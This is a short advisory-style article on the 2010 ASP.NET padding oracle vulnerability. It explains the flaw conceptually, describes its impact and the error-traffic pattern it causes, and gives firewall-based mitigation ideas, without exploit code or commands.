ASP.NET Security Vulnerability

Summary
On 18/09/2010 a Microsoft Security Advisory was released about a security vulnerability in ASP.NET. This vulnerability exists in all versions of ASP.NET and the recommendation was made that customers immediately apply a workaround to prevent attackers from using this vulnerability against ASP.NET applications.

Impact
An attacker using this vulnerability can request and download files forming part of an ASP.NET application, such as the web.config file, which may contain sensitive data. He can also decrypt data sent to the client in an encrypted state (for example ViewState hidden data in application replies).

Vulnerability Details
To understand how this vulnerability works, you need to know a little about cryptographic oracles. An oracle in the context of cryptography is a system which provides hints as you ask it questions. In this case, there is a vulnerability in the ASP.NET component which acts as a padding oracle. It allows an attacker to send cipher text to the web server and learn if it was decrypted properly, by examining which error code was returned by the web server. By making many such requests and watching what errors are returned, the attacker can learn enough to successfully decrypt the rest of the cipher text.

Attack Properties
In practice, this exploit would cause the web server to generate thousands of HTTP 500 and 404 error responses (or more) to requests from the malicious client. This means the attacker needs to send many requests to the application in order to exploit the vulnerability.

Mitigation
Microsoft is planning to release a patch to resolve the problem, but what can be done in the meantime?
For now, security filter assistance can provide a quick and effective solution to the problem. The security filter needs to have combined abilities as follows:

• To detect abnormal access rate to URLs in the application.
• To inspect application outbound replies and detect error messages.
• To track session base access rate (assuming the attacker will be using a DDoS approach to perform his attack, using different source IPs).

It would be wise to make sure your web application firewall has these capabilities and can be easily configured to protect your application in the event of such vulnerabilities.